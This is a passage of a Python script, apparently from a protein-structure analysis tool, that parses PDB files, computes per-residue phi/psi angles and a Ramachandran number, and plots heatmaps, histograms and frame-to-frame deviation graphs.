resname\n\t\t\t\t\tsingleaa = resname\n\t\t\t\t\tif resname in aa_three_to_one:\n\t\t\t\t\t\tsingleaa = 
aa_three_to_one[resname]\n\t\t\t\t\tmodel_to_chain_to_resno_atom_to_vals[model_number][segname][resno][\"aa\"] = singleaa\n\t\t\t\t\tmodel_to_chain_to_resno_atom_to_vals[model_number][segname][i][\"n\"] = b\n\t\t\t\t\tmodel_to_chain_to_resno_atom_to_vals[model_number][segname][i][\"ca\"] = c\n\t\t\t\t\tmodel_to_chain_to_resno_atom_to_vals[model_number][segname][i][\"c\"] = d\n\t\t\t\t\n\t\t\t\texcept:\n\t\t\t\t\tneighbors_found = 0\n\t\t\t\t\n\t\t\t\tif neighbors_found: #im in resids and ip in resids:\n\t\t\t\t\tphi = calculate_dihedral_angle(np.array([a,b,c,d]))\n\t\t\t\t\tpsi = calculate_dihedral_angle(np.array([b,c,d,e]))\n\t\t\t\t\trho = normalized_ramachandran_number(phi,psi,signed)\n\t\t\t\t\t#\n\t\t\t\t\tmodel_to_chain_to_resno_atom_to_vals[model_number][segname][i][\"phi\"] = phi\n\t\t\t\t\tmodel_to_chain_to_resno_atom_to_vals[model_number][segname][i][\"psi\"] = psi\n\t\t\t\t\tmodel_to_chain_to_resno_atom_to_vals[model_number][segname][i][\"R\"] = rho\n\t\t\t\t\t#\n\t\t\t\t#\n\t\t\t#\n\t\t#\n\t\tif not len(model_to_chain_to_resno_atom_to_vals[model_number]):\n\t\t\tdel model_to_chain_to_resno_atom_to_vals[model_number]\n\t#\n\t\n\t\n\treturn model_to_chain_to_resno_atom_to_vals\n\n# OLD VERSION (IN HOUSE). 
IT IS FASTER THAN THE CURRENT \"read_pdb\", WHICH IS BIOPDB RUN, BUT IT IS NOT \n# AS WELL TESTED.\ndef read_pdb_inhouse(fn,signed=0):\n\t\"\"\"\n\tATOM 10 1H LYS A 1 0.763 3.548 -0.564\n\tATOM 11 2H LYS A 1 1.654 2.664 0.488\n\tATOM 482 N PRO A 61 27.194 -5.761 14.684 1.00 9.09 N \n\tATOM 2 CA BLYSX 1 -77.937 -26.325 6.934 1.00 0.00 U1 \n\tATOM 3 CB BLYSX 1 -79.612 -24.499 7.194 1.00 0.00 U1 \n\tATOM 4 CE BLYSX 1 -80.894 -24.467 8.039 1.00 0.00 U1 \n\tATOM 5 NZ BLYSX 1 -80.687 -24.160 9.434 1.00 0.00 U1 \n\tATOM 2 HT1 MET U 1 0.208 0.762 -12.141 0.00 0.00 UBIQ \n\tATOM 3 HT2 MET U 1 -1.052 -0.551 -12.281 0.00 0.00 UBIQ \n\t | | | | | | | | |\n\t atomno | | | | x y z segname\n\t atom type | | | (CHAIN)\n\t restype | 3resno\n\t chainID\n\t\"\"\"\n\t\n\tf = open(fn,\"r\")\n\tpdbblock = f.read()\n\tf.close()\n\t\n\tgetlines = re.compile(r\"ATOM\\s+(?P\\d+)\\s+(?P\\S+)\\s+.(?P...)..\\s+(?P\\d+)\\s+(?P\\-*\\d+\\.*\\d*)\\s+(?P\\-*\\d+\\.*\\d*)\\s+(?P\\-*\\d+\\.*\\d*).{17}(?P.{5})\",re.M)\n\tgetlines_short = re.compile(r\"ATOM\\s+(?P\\d+)\\s+(?P\\S+)\\s+(?P...).(?P.)\\s+(?P\\d+)\\s+(?P\\-*\\d+\\.*\\d*)\\s+(?P\\-*\\d+\\.*\\d*)\\s+(?P\\-*\\d+\\.*\\d*)\",re.M)\n\t\n\tresnos = []\n\t#models = pdbblock.split(\"\\nEND\\n\")\n\tmodels = re.split(r\"\\nEND|\\nMODEL|\\nTER\",pdbblock)\n\t\n\tmodel_number = 0\n\tmodel_to_chain_to_resno_atom_to_vals = {}\n\t# structure (models) -> model -> chain -> residue -> atom\n\t\n\t#t0 = time.time()\n\t#print \"#\\treading...\",\n\tfor model_index in range(len(models)):\n\t\tmodel = models[model_index]\n\t\tif len(model.rstrip()) > 1:\n\t\t\tmodel_number+=1\n\t\t\tif not model_number in model_to_chain_to_resno_atom_to_vals:\n\t\t\t\tmodel_to_chain_to_resno_atom_to_vals[model_number] = {}\n\t\t\t\n\t\t\tsegname_exists = 1\n\t\t\tcurrentlines = getlines.finditer(model)\n\t\t\tif not getlines.search(model):\n\t\t\t\tcurrentlines = getlines_short.finditer(model)\n\t\t\t\tsegname_exists = 0\n\t\t\t\n\t\t\tfor i in currentlines:\n\t\t\t\tvals = 
i.groupdict()\n\t\t\t\tatomtype = vals[\"atomtype\"] #line[11:17].lstrip().rstrip()\n\t\t\t\t\n\t\t\t\tif atomtype==\"CA\" or atomtype ==\"N\" or atomtype ==\"C\":\n\t\t\t\t\tresno = int(vals[\"resno\"]) #int(resno) #int(line[22:26].lstrip().rstrip())\n\t\t\t\t\txyz = np.array([float(vals[\"x\"]),float(vals[\"y\"]),float(vals[\"z\"])])\n\t\t\t\t\t\n\t\t\t\t\tsegname = \"A\"\n\t\t\t\t\tif segname_exists:\n\t\t\t\t\t\tsegname = vals[\"segname\"].lstrip().rstrip()\n\t\t\t\t\t\n\t\t\t\t\tif not segname in model_to_chain_to_resno_atom_to_vals[model_number]:\n\t\t\t\t\t\tmodel_to_chain_to_resno_atom_to_vals[model_number][segname] = {}\n\t\t\t\t\t\n\t\t\t\t\tif not resno in model_to_chain_to_resno_atom_to_vals[model_number][segname]:\n\t\t\t\t\t\tmodel_to_chain_to_resno_atom_to_vals[model_number][segname][resno] = {}\n\t\t\t\t\t\n\t\t\t\t\tmodel_to_chain_to_resno_atom_to_vals[model_number][segname][resno][atomtype.lower()] = xyz\n\t\t\t\t\tmodel_to_chain_to_resno_atom_to_vals[model_number][segname][resno][\"resname\"] = vals[\"resname\"]\n\t\t\t\n\t\t\tif not len(model_to_chain_to_resno_atom_to_vals[model_number]):\n\t\t\t\tdel model_to_chain_to_resno_atom_to_vals[model_number]\n\t\t\t\tmodel_number-=1\n\t#\n\tfor model in sorted(model_to_chain_to_resno_atom_to_vals.keys()):\n\t\tfor chain in sorted(model_to_chain_to_resno_atom_to_vals[model].keys()):\n\t\t\tfor resno in sorted(model_to_chain_to_resno_atom_to_vals[model][chain].keys()):\n\t\t\t\ttriplet_found = 0\n\t\t\t\tif \"ca\" in model_to_chain_to_resno_atom_to_vals[model][chain][resno]:\n\t\t\t\t\ttriplet_found+=1\n\t\t\t\tif \"n\" in model_to_chain_to_resno_atom_to_vals[model][chain][resno]:\n\t\t\t\t\ttriplet_found+=1\n\t\t\t\tif \"c\" in model_to_chain_to_resno_atom_to_vals[model][chain][resno]:\n\t\t\t\t\ttriplet_found+=1\n\t\t\t\tif triplet_found == 3:\n\t\t\t\t\ti = resno\n\t\t\t\t\tim = i-1\n\t\t\t\t\tip = i+1\n\t\t\t\t\t\n\t\t\t\t\tneighbors_found = 0\n\t\t\t\t\tif im in 
model_to_chain_to_resno_atom_to_vals[model][chain]:\n\t\t\t\t\t\tif \"c\" in model_to_chain_to_resno_atom_to_vals[model][chain][im]:\n\t\t\t\t\t\t\tneighbors_found += 1\n\t\t\t\t\tif ip in model_to_chain_to_resno_atom_to_vals[model][chain]:\n\t\t\t\t\t\tif \"n\" in model_to_chain_to_resno_atom_to_vals[model][chain][ip]:\n\t\t\t\t\t\t\tneighbors_found += 1\n\t\t\t\t\t\n\t\t\t\t\tif neighbors_found == 2: #im in resids and ip in resids:\n\t\t\t\t\t\ta = model_to_chain_to_resno_atom_to_vals[model][chain][im][\"c\"] # resno_to_coordC[before]\n\t\t\t\t\t\tb = model_to_chain_to_resno_atom_to_vals[model][chain][i][\"n\"] # resno_to_coordN[current]\n\t\t\t\t\t\tc = model_to_chain_to_resno_atom_to_vals[model][chain][i][\"ca\"] #resno_to_coordCA[current]\n\t\t\t\t\t\td = model_to_chain_to_resno_atom_to_vals[model][chain][i][\"c\"] # resno_to_coordC[current]\n\t\t\t\t\t\te = model_to_chain_to_resno_atom_to_vals[model][chain][ip][\"n\"] # resno_to_coordN[after]\n\t\t\t\t\t\t\n\t\t\t\t\t\tphi = calculate_dihedral_angle(np.array([a,b,c,d]))\n\t\t\t\t\t\tpsi = calculate_dihedral_angle(np.array([b,c,d,e]))\n\t\t\t\t\t\trho = normalized_ramachandran_number(phi,psi,signed)\n\t\t\t\t\t\t\n\t\t\t\t\t\tmodel_to_chain_to_resno_atom_to_vals[model][chain][i][\"phi\"] = phi\n\t\t\t\t\t\tmodel_to_chain_to_resno_atom_to_vals[model][chain][i][\"psi\"] = psi\n\t\t\t\t\t\tmodel_to_chain_to_resno_atom_to_vals[model][chain][i][\"R\"] = rho\n\t#\n\treturn model_to_chain_to_resno_atom_to_vals\n#\n\ndef check_pdb(fn):\n\t\"\"\"\n\tATOM 10 1H LYS A 1 0.763 3.548 -0.564\n\tATOM 11 2H LYS A 1 1.654 2.664 0.488\n\tATOM 482 N PRO A 61 27.194 -5.761 14.684 1.00 9.09 N \n\tATOM 2 CA BLYSX 1 -77.937 -26.325 6.934 1.00 0.00 U1 \n\tATOM 3 CB BLYSX 1 -79.612 -24.499 7.194 1.00 0.00 U1 \n\tATOM 4 CE BLYSX 1 -80.894 -24.467 8.039 1.00 0.00 U1 \n\tATOM 5 NZ BLYSX 1 -80.687 -24.160 9.434 1.00 0.00 U1 \n\tATOM 2 HT1 MET U 1 0.208 0.762 -12.141 0.00 0.00 UBIQ \n\tATOM 3 HT2 MET U 1 -1.052 -0.551 -12.281 0.00 0.00 
UBIQ \n\t | | | | | | | | |\n\t atomno | | | | x y z segname\n\t atom type | | | (CHAIN)\n\t restype | resno\n\t chainID\n\t\"\"\"\n\t\n\tchainIDindex = 21\n\tchainIDindexMinusOne = chainIDindex-1\n\tlenATOM = len(\"ATOM \")\n\t\n\tchainIDpossibilities = \"\"\n\tchainIDpossibilities+=string.uppercase # 'A' through 'Z'.\n\tfor i in range(10):\n\t\tchainIDpossibilities+=str(i)\n\tchainIDpossibilities+=string.lowercase # 'a' through 'z'.\n\tlenchainIDpossibilities = len(chainIDpossibilities)\n\tlargestchainIDindex = 0\n\t\n\tmade_changes = 0\n\tf = open(fn,\"r\")\n\tlines = f.readlines()\n\tf.close()\n\tpdb_is_possibly_problematic = 0\n\tsegname_to_chainID = {}\n\tfor i in range(len(lines)):\n\t\tif len(lines[i]) > 67:\n\t\t\tif lines[i][:lenATOM] == \"ATOM \":\n\t\t\t\tchainID = lines[i][chainIDindex].rstrip()\n\t\t\t\tchainIDspacebefore = lines[i][chainIDindexMinusOne].rstrip()\n\t\t\t\tif len(chainIDspacebefore): # This is because some CHARMM sidechains have four letters, and that trips biopython\n\t\t\t\t\tpdb_is_possibly_problematic = 1\n\t\t\t\t\n\t\t\t\tif len(chainID)==0 or chainID==\"X\": # CHARMM SOMETIMES SAVES THE CHAINID AS 'X' IRRESPECTIVE OF SEGNAME\n\t\t\t\t\tpdb_is_possibly_problematic = 1\n\t\t\t\t#\n\t\t\t#\n\t\t#\n\tif pdb_is_possibly_problematic:\n\t\treturn 0\n\telse:\n\t\treturn 1\n#\ndef read_pdb(fn,signed=0):\n\traw_pdb_data = False\n\tif biopython:\n\t\tif check_pdb(fn):\n\t\t\traw_pdb_data = read_pdb_biopython(fn,signed=signed)\n\t\telse:\n\t\t\traw_pdb_data = read_pdb_inhouse(fn,signed=signed)\n\telse:\n\t\traw_pdb_data = read_pdb_inhouse(fn,signed=signed)\n\t#\n\tmatrix_material = [['model','chain','resid','R']]\n\tfor model in list(raw_pdb_data.keys()):\n\t\tfor chain in list(raw_pdb_data[model].keys()):\n\t\t\tfor resid in list(raw_pdb_data[model][chain].keys()):\n\t\t\t\tR = False\n\t\t\t\tif 'R' in raw_pdb_data[model][chain][resid]:\n\t\t\t\t\tR = 
raw_pdb_data[model][chain][resid]['R']\n\t\t\t\tmatrix_material.append([int(model),chain,int(resid),R])\n\t\n\t# Creating a matrix that can be queriable later\n\tpdb_matrix = np.array(matrix_material,dtype='O')\n\treturn pdb_matrix\n#\n\n# From: https://stackoverflow.com/questions/7965743/how-can-i-set-the-aspect-ratio-in-matplotlib\ndef forceAspect(aspect,ax=False):\n\tif not ax: ax=plt.gca()\n\textent = plt.axis()\n\tax.set_aspect(abs((extent[1]-extent[0])/(extent[3]-extent[2]))/aspect)\n#\n\ndef write_image(fn_base):\n\tplt.savefig(fn_base+'.eps',dpi=200,bbox_inches='tight')\n\tplt.savefig(fn_base+'.png',dpi=200,bbox_inches='tight')\n\tif show: plt.show();\n#\n\ndef draw_xyz(X,Y,Z, ylim=False, cmap='Greys', xlabel=False,ylabel=False,zlabel=False,title=False,vmin=None,vmax=None):\n\t\n\taspect = 2.\n\tif len(set(X)) == 1:\n\t\t# Some structures have only one model, which is too thin, \n\t\t# so we add another row with everything else being identical \n\t\t# except that all new xs are skewed by 1\n\t\tX = list(X) + list(np.array(X)+1)\n\t\tY = list(Y) + list(Y)\n\t\tZ = list(Z) + list(Z)\n\t\t# Also, the aspect ratio needs to be reset, since we are dealing with only one column\n\t\taspect = .2\n\t#\n\t# Getting unique values for X\n\tsetX = sorted(set(X))\n\t# Getting unique values for Y \n\tsetY = sorted(set(Y))\n\t\n\t# Code that offsets the values\n\tif 1: \n\t\t# We want whole numbers to be situated at the middle of each column, not at the beginning and end\n\t\t# X\n\t\t# Getting the grid step size\n\t\txsteps = []\n\t\tfor i in range(1,len(setX)):\n\t\t\txsteps.append(setX[i]-setX[i-1])\n\t\txstep = np.median(xsteps)\n\t\t# Making the offset\n\t\tX = np.array(X)-xstep\n\t\t# Y\n\t\t# Getting the grid step size\n\t\tysteps = []\n\t\tfor i in range(1,len(setY)):\n\t\t\tysteps.append(setY[i]-setY[i-1])\n\t\tystep = np.median(ysteps)\n\t\t# Making the offset\n\t\tY = np.array(Y)-ystep\n\t\t\n\t\t# Resetting the sorted unique values\n\t\t# Getting unique values 
for X\n\t\tsetX = sorted(set(X))\n\t\t# Getting unique values for Y \n\t\tsetY = sorted(set(Y))\n\t\t\t\n\t\n\t#\n\t# A dictionary containing X values and their indices once ordered \n\tX_to_ix = dict([[setX[ix],ix] for ix in range(len(setX))])\n\t# Creating a new array of indices instead of values\n\tXix = [ X_to_ix[v] for v in X ]\n\t\n\t# A dictionary containing X values and their indices once ordered \n\tY_to_ix = dict([[setY[ix],ix] for ix in range(len(setY))])\n\t# Creating a new array of indices instead of values\n\tYix = [ Y_to_ix[v] for v in Y ]\n\t\n\t# Creating an empty array with the right dimensions\n\tz_array = np.zeros((len(setY),len(setX))) * np.nan\n\t# Setting values of Z based on their position in the matrix\n\tz_array[Yix, Xix] = Z\n\t\n\t# Initiating the figure\n\tax = plt.gca()\n\t# Drawing the main part of the figure\n\t\n\tim = plt.imshow(z_array,origin='lower',cmap=cmap,vmin=vmin,vmax=vmax,interpolation='nearest', extent=[min(X),max(X),min(Y),max(Y)])\n\t\n\t# create an axes on the right side of ax. 
The width of cax will be 5%\n\t# of ax and the padding between cax and ax will be fixed at 0.05 inch.\n\tcb = plt.colorbar(im,fraction=0.023, pad=0.04)\n\t[i.set_linewidth(1.5) for i in ax.spines.values()]\n\t\n\t# Setting labels\n\tif xlabel: plt.xlabel(xlabel, fontsize=15);\n\tif ylabel: plt.ylabel(ylabel, fontsize=15);\n\tif zlabel: cb.ax.set_title(zlabel, rotation=0,fontsize=15);\n\t\n\t# Setting title\n\tif title: plt.title(title,fontsize=16)\n\t\n\t# limiting y if specified\n\tif ylim: plt.ylim(ylim);\n\t\n\t# Setting the aspect ratio\n\tforceAspect(aspect,ax=ax)\n\t\n\t# Neatening things out\n\tplt.tight_layout()\n\t#\n\t# To see this graph and quit, uncomment the following:\n\t#plt.show(); exit();\n\treturn True\n#\n\n# Grouping each data by \ndef group_data_by(data,group_by=\"chain\",columns_to_return=['model','resid','R']):\n\t# Getting column indices for each column name\n\trx = {} # \"rx\" for Row indeX\n\t# Taking the first row and getting the column name and index\n\tfor col in data[0,:]:\n\t\trx[col] = list(data[0,:]).index(col)\n\t# \n\tgroup_by_values = sorted(set(data[1:,rx[group_by]]))\n\t#\n\tgrouped_data = {}\n\tfor filter_value in group_by_values:\n\t\tcurrent_data = data[np.where(data[:,rx[group_by]] == filter_value)]\n\t\tgrouped_data[filter_value] = []\n\t\tfor return_column in columns_to_return:\n\t\t\tgrouped_data[filter_value].append(current_data[:,rx[return_column]])\n\t#\t\n\treturn grouped_data\n#\n\n# This is the stand along program (used by __main__.py)\ndef main():\n\tcolortype = \"Chirality\" # can be SecondaryStructure\n\tglobal signed, show\n\tshow = 1\n\tif not \"-pdb\" in sys.argv:\n\t\tif \"-h\" in sys.argv or \"-help\" in sys.argv or \"--help\" in sys.argv:\n\t\t\tpass\n\t\telse:\n\t\t\tprint(\"Must provide '-pdb' parameter. 
Exiting.\")\n\t\t\texit(0)\n\t\n\ttarget_dir = False\n\tfor i in range(len(sys.argv)):\n\t\tif sys.argv[i] == \"-rmsd\":\n\t\t\tshowrmsd = 1\n\t\tif sys.argv[i] == \"-show\":\n\t\t\tshow = True\n\t\tif sys.argv[i] == \"-signed\":\n\t\t\tprint(\"Using the R number with range [-1,1]\")\n\t\t\tsigned = 1\n\t\t\trrange = [-1,1]\n\t\tif sys.argv[i] == \"-ss\":\n\t\t\tcolortype = \"SecondaryStructure\" # default: chirality\n\t\tif sys.argv[i] == \"-h\" or sys.argv[i] == \"-help\" or sys.argv[i] == \"--help\":\n\t\t\tprint(helpme)\n\t\t\texit(1)\n\t\tif sys.argv[i] == \"-pdb\":\n\t\t\tif len(sys.argv) <= i+1:\n\t\t\t\tprint(helpme)\n\t\t\t\tprint(\"MUST PROVIDE PDB NAME.\")\n\t\t\t\texit(0)\n\t\t\telse:\n\t\t\t\tpdbfn = str(sys.argv[i+1])\n\t\t\t\tprint(\"# pdbfn set to:\",pdbfn)\n\t\tif sys.argv[i] == \"-target\":\n\t\t\tif len(sys.argv) <= i+1:\n\t\t\t\tprint(helpme)\n\t\t\t\tprint(\"MUST PROVIDE TARGET DIR.\")\n\t\t\t\texit(0)\n\t\t\telse:\n\t\t\t\ttarget_dir = str(sys.argv[i+1])\n\t\t\t\tif os.path.isdir(target_dir):\n\t\t\t\t\tpass\n\t\t\t\telse:\n\t\t\t\t\tprint('SPECIFIED TARGET DIR (%s) DOES NOT EXIST' %(target_dir))\n\t\t\t\tprint(\"# target directory set to:\",target_dir)\n\t\telif sys.argv[i] == \"-bins\":\n\t\t\tif len(sys.argv) <= i+1:\n\t\t\t\thelpme\n\t\t\t\tprint(\"When using '-bins', you must provide bin number. Exiting.\")\n\t\t\t\texit(0)\n\t\t\telse:\n\t\t\t\tif not sys.argv[i+1].isdigit():\n\t\t\t\t\tprint(helpme)\n\t\t\t\t\tprint(\"The -bin parameter must be a positive integer (provided: \"+str(sys.argv[i+1])+\") Exiting.\")\n\t\t\t\t\texit(0)\n\t\t\t\telse:\n\t\t\t\t\tbins = int(sys.argv[i+1])\n\t\t\t\t\tprint(\"# bins set to:\",bins)\n\t\t\t\t\tif bins == 0:\n\t\t\t\t\t\tprint(helpme)\n\t\t\t\t\t\tprint(\"Must have greater than 0 bins. 
Exiting.\")\n\t\t\t\t\t\texit(0)\n\t\n\tcolormap_name = colortype\n\tif signed:\n\t\tcolormap_name = colortype+'FourColor'\n\tprint(\"Using color map name:\",colormap_name)\n\trcode_cmap = plt.get_cmap(colormap_name)\n\t#rcode_cmap = plt.get_cmap(\"deletemeSigned\")\n\t\n\tpdbfn = os.path.abspath(pdbfn)\n\tpdbdir = os.path.dirname(pdbfn)\n\tpdbfilenames = []\n\t\n\tif os.path.isfile(pdbfn):\n\t\t# then this pathname leads to a FILE\n\t\t# ... so keep as is\n\t\tpdbfilenames = [pdbfn]\n\t\tname = re.split('[\\/\\.]',pdbfn)[-2]\n\telif os.path.isdir(pdbfn):\n\t\tpdbdir = pdbfn\n\t\tpdbfilenames = sorted(glob.glob(pdbdir+\"/*.pdb\"))\n\t\tname = re.split('[\\/\\.]',pdbfn)[-1]\n\telse:\n\t\tprint(helpme)\n\t\texit(\"Either filename or directory expected. Exiting.\")\n\t#\n\tif not target_dir:\n\t\ttarget_dir = pdbdir+\"/reports/\"\n\tif not os.path.isdir(target_dir):\n\t\tos.makedirs(target_dir)\n\t\t\n\t#NAME = os.path.basename(pdbfilenames[0])[:-len(\".pdb\")]\n\ttarget_base = target_dir.rstrip(\"/\")+\"/\"\n\t#\n\t\n\t# JUST \"CLEVERLY\" ARRANGING THE FILENAMES, IF WE HAVE A SET OF FILENAMES RATHER THAN ONE\n\t# (e.g., pdbfilenames = [something2part1,something1part2,something1part1,something10part1]\n\t# pdbfilenames.sort() this list to: [something1part1,something1part2,something2part1,something10part1]\n\tREXP = re.compile( r'\\d+' )\n\tdef key_function( s ): return list(map(int, re.findall(REXP, s )))\n\tpdbfilenames.sort( key=key_function)\n\t\n\tprint(\"# Parsing the PDB (structure) data\")\n\tstructure = np.array([])\n\tfor pdbfn in pdbfilenames:#[:10]:\n\t\t#print(pdbfn)\n\t\t# Check if the PDB has no subunit IDs, and then check if segnames exist (right most column)\n\t\t# and renaming the subunit IDs alphabetically and then numerically\n\t\t\n\t\t# READ PDB in the form of a matrix with columns ['model','chain','resid','R']\n\t\tlatest_structure = read_pdb(pdbfn,signed)\n\t\t\n\t\t\n\t\t# Getting column indices for each column name\n\t\trx = {} # \"rx\" for 
Row indeX\n\t\tfor c in latest_structure[0,:]:\n\t\t\trx[c] = list(latest_structure[0,:]).index(c)\n\t\t#\n\t\t\n\t\tsorted_models = sorted(list(set(latest_structure[1:,rx['model']])))\n\t\tcurrent_model_number = 0\n\t\toriginal_to_new_model_numbers = {}\n\t\tfor actual_model_number in sorted_models:\n\t\t\tcurrent_model_number += 1\n\t\t\toriginal_to_new_model_numbers[actual_model_number] = current_model_number\n\t\t#\n\t\t\n\t\t# Checking if we already have some structures loaded (then we have to offset the model numbers)\n\t\tif len(structure):\n\t\t\t#\n\t\t\tlargest_model_number = max(list(structure[1:,rx['model']]))\n\t\t\tfor m in list(original_to_new_model_numbers.keys()):\n\t\t\t\toriginal_to_new_model_numbers[m] = original_to_new_model_numbers[m] + largest_model_number\n\t\t\t#\n\t\t#\n\t\t# Resetting model numbers \n\t\tnew_model_numbers = [original_to_new_model_numbers[actual_model_number] for actual_model_number in latest_structure[1:,rx['model']]]\n\t\tlatest_structure[1:,rx['model']] = copy.deepcopy(new_model_numbers)\n\t\t#\t\n\t\t\n\t\tif len(structure):\n\t\t\t# Copying as structure\n\t\t\tstructure = np.append(structure,copy.deepcopy(latest_structure[1:]), axis=0)\n\t\telse:\n\t\t\t# Adding the current model to structure\n\t\t\tstructure = copy.deepcopy(latest_structure)\n\t\t#print(structure[:,rx['model']])\n\t\t#print(pdbfn)\n\t\t#input()\n\t#\n\tprint(\"\\t...done\")\n\t\n\t##########################################################################################################\n\t# READ PDB in the form of a matrix with columns\n\t#data = read_pdb(pdbfn)\n\tdata = structure\n\t# Getting only those values for the particular chain \n\tgrouped_data = group_data_by(data,group_by='chain', \n\t\t\t\t\t\tcolumns_to_return=['model','resid','R'])\n\t\n\tpdbfn = os.path.split(pdbfn)[-1][:-len('.pdb')]\n\t\n\tprint(\" ---- \\t---------\")\n\tprint(\" TEST \\tTEST NAME\")\n\tprint(\" ---- \\t---------\")\n\t\n\tvmin = 0; \n\tvmax = 1;\n\tss_cmap = 
'SecondaryStructure'\n\tchirality_cmap = 'Chirality'\n\tif signed:\n\t\tvmin = -1; \n\t\tvmax = 1;\n\t\tss_cmap = ss_cmap + 'FourColor'\n\t\tchirality_cmap = chirality_cmap + 'FourColor'\n\t#\n\t\t\n\tprint(\" 1 \\tRamachandran number (PDB: %s)\"%(name))\n\t\n\t# setting the name of the colormap\n\tfor cmap in ['Greys',ss_cmap,chirality_cmap]: #, 'Chirality_r', 'SecondaryStructureHard']:\n\t\t# DRAWING A SINGLE GRAPH\n\t\tfor chain in list(grouped_data.keys()):\n\t\t\tfinal_name = name\n\t\t\tif len(chain.rstrip()):\n\t\t\t\tfinal_name+='-'+str(chain)\n\t\t\t\n\t\t\t# Getting the X,Y,Z values for each entry\n\t\t\tmodels, residues, Rs = grouped_data[chain]\n\t\t\t\n\t\t\t# Finally, creating (but not showing) the graph \n\t\t\tplt.clf()\t\n\t\t\tdraw_xyz(X = models , Y = residues , Z = Rs\n\t\t\t\t\t , xlabel ='Frame #', ylabel =\"Residue #\",zlabel ='$\\mathcal{R}$'\n\t\t\t\t\t , title='Per-residue $\\mathcal{R}$; CMAP: %s\\nPDB: %s' %(cmap,final_name)\n\t\t\t\t\t , cmap = cmap , vmin=vmin, vmax=vmax)\n\t\t\t#\n\t\t\t# Now, we display the graph:\n\t\t\tFN = target_base+'pdb_%s_r_%s' %(final_name,cmap)\n\t\t\twrite_image(FN)\n\t\t\tprint(\"\\tSaved to:\",FN)\n\t#\n\t# Getting only those values for the particular chain \n\tprint(\" 2. 
\\tHistogram (PDB: 1xqq)\")\n\tfor chain in list(grouped_data.keys()):\n\t\tfinal_name = name\n\t\tif len(chain.rstrip()):\n\t\t\tfinal_name+='-'+str(chain)\n\t\t\n\t\t# Getting the X,Y,Z values for each entry\n\t\tmodels, residues, Rs = grouped_data[chain]\n\t\tX = []; Y=[]; Z=[]; # Will set X=model, Y=R, Z=P(R)\n\t\t# Bundling the three lists into one 2d array\n\t\tnew_data = np.array(list(zip(models,residues,Rs)))\n\t\t# Getting all R values, model by model\n\t\tfor m in sorted(set(new_data[:,0])): # column 0 is the model column\n\t\t\t# Getting all Rs for that model #\n\t\t\tcurrent_rs = new_data[np.where(new_data[:,0]==m)][:,2] # column 2 contains R\n\t\t\t# Getting the histogram\n\t\t\ta,b = np.histogram(current_rs,bins=np.arange(vmin,vmax+0.0001,0.01))\n\t\t\tmax_count = float(np.max(a))\n\t\t\tfor i in range(len(a)):\n\t\t\t\tX.append(m); Y.append((b[i]+b[i+1])/2.0); Z.append(a[i]/float(np.max(a)));\n\t\t\n\t\t# Finally, creating (but not showing) the graph \n\t\tplt.clf()\n\t\tdraw_xyz(X = X , Y = Y , Z = Z\n\t\t ,xlabel ='Frame #', ylabel =\"$\\mathcal{R}$\",zlabel =\"$P'(\\mathcal{R})$:\"\n\t\t\t ,cmap = 'Greys', ylim=[vmin,vmax],title='Per-model $\\mathcal{R}$-histogram\\nPDB: %s'%(final_name))\n\t\tplt.yticks(np.arange(vmin,vmax+0.00001,0.2))\n\t\t# Now, we display the graph:\n\t\tFN = target_base+'pdb_%s_his'%(final_name)\n\t\twrite_image(FN)\n\t\tprint(\"\\tSaved to:\",FN)\n\t#\n\t#\n\t\n\tprint(\" 3. 
\\tRMSF Test (PDB: {})\".format(pdbfn))\n\tfor chain in list(grouped_data.keys()):\n\t\tfinal_name = name\n\t\tif len(chain.rstrip()):\n\t\t\tfinal_name+='-'+str(chain)\n\t\t\n\t\t# Getting the X,Y,Z values for each entry\n\t\tmodels, residues, Rs = grouped_data[chain]\n\t\t\n\t\tif len(set(models)) > 1:\n\t\t\tX = []; Y=[]; Z=[]; # Will set X=model, Y=R, Z=P(R)\n\t\t\t# Bundling the three lists into one 2d array\n\t\t\tnew_data = np.array(list(zip(models,residues,Rs)))\n\t\t\t\n\t\t\treference_model_number = sorted(set(models))[0]\n\t\t\t\n\t\t\treference_data = new_data[new_data[:,0]==reference_model_number]\n\t\t\t\n\t\t\tfinal_data = []\n\t\t\tsorted_models = sorted(set(models))\n\t\t\tfor mx in range(1,len(sorted_models)):\n\t\t\t\tm1 = sorted_models[mx-1]\n\t\t\t\tm2 = sorted_models[mx]\n\t\t\t\t\n\t\t\t\tcurrent_model = new_data[new_data[:,0]==m2]\n\t\t\t\tcurrent_model[:,2] = np.abs(current_model[:,2] - new_data[new_data[:,0]==m1][:,2])\n\t\t\t\tif not len(final_data):\n\t\t\t\t\tfinal_data = copy.deepcopy(current_model)\n\t\t\t\telse:\n\t\t\t\t\tfinal_data = np.append(final_data,current_model,axis=0)\n\t\t\t\t#\n\t\t\t\t\n\t\t\tX = final_data[:,0]; \n\t\t\tY = final_data[:,1]; \n\t\t\tZ = final_data[:,2]; \n\t\t\t\n\t\t\t# Finally, creating (but not showing) the graph \n\t\t\tplt.clf()\n\t\t\tdraw_xyz(X = X , Y = Y , Z = Z\n\t\t\t ,xlabel ='Frame #', ylabel =\"$Residue \\#$\",zlabel =\"$D_{-1}$\"\n\t\t\t\t ,cmap = 'Blues', title='Per-residue deviation $D_{-1} = |\\mathcal{R}_t - \\mathcal{R}_{t-1}|$\\nPDB: %s'%(final_name))\n\t\t\t\n\t\t\t# Now, we display the graph:\n\t\t\tFN = target_base+'pdb_%s_rmsf'%(final_name)\n\t\t\twrite_image(FN)\n\t\t\tprint(\"\\tSaved to:\",FN)\n\t\telse:\n\t\t\tprint('\\tChain \"%s\" has only one model. Not drawing this graph.' %(chain))\n\t#\n\t#\n\tprint(' 4. 
\\tRMSD Test (PDB: {})'.format(pdbfn))\n\tfor chain in list(grouped_data.keys()):\n\t\tfinal_name = name\n\t\tif len(chain.rstrip()):\n\t\t\tfinal_name+='-'+str(chain)\n\t\t\n\t\t# Getting the X,Y,Z values for each entry\n\t\tmodels, residues, Rs = grouped_data[chain]\n\t\t\n\t\t\n\t\tif len(set(models)) > 1:\n\t\t\tX = []; Y=[]; Z=[]; # Will set X=model, Y=R, Z=P(R)\n\t\t\t# Bundling the three lists into one 2d array\n\t\t\tnew_data = np.array(list(zip(models,residues,Rs)))\n\t\t\t\n\t\t\treference_model_number = sorted(set(models))[0]\n\t\t\t\n\t\t\treference_data = new_data[new_data[:,0]==reference_model_number]\n\t\t\t\n\t\t\tfinal_data = []\n\t\t\tfor m in sorted(set(models)):\n\t\t\t\tcurrent_model = new_data[new_data[:,0]==m]\n\t\t\t\tcurrent_model[:,2] = 